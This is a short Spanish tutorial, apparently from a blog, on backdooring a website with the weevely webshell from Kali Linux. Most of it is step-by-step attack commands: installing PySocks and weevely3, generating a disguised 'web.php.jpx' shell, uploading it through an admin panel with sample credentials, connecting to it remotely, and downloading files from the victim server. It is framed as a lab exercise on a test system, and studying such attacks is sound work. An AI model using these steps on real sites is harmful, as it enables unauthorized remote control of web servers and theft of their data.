Backdoor Webshell con weevely en Kali Linux
Introducción
En este manual vamos a analizar la forma en la que usuarios malintencionados pueden llegar a tomar control de nuestros sistemas web (paginas web). Para evitar que lleguen a colocarnos archivos archivos maliciosos en nuestro sistema debemos de sanitisar nuestro código con las medidas de seguridad que el mismo php recomienda
Recordemos que para hacer nuestras pruebas debemos tener un sistema de pruebas con vulnerabilidades lo cual lo podemos instalar siguiendo este manual.
Instalación
En los siguientes sencillos 3 pasos podemos iniciar nuestra pruebas con weevely:
1.- Instalamos PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
2.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo
En caso de que el comando anterior de errores quizás falta instalar dependencias como se muestra aqui
3.- Subimos el archivo web.php.jpx a la pagina victima
En mi caso:
http://192.168.8.103/admin/
User: admin
Password: P4ssw0rd
En mi caso:
http://192.168.8.103/admin/
User: admin
Password: P4ssw0rd
Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png
Ave que vuela, a la cazuela.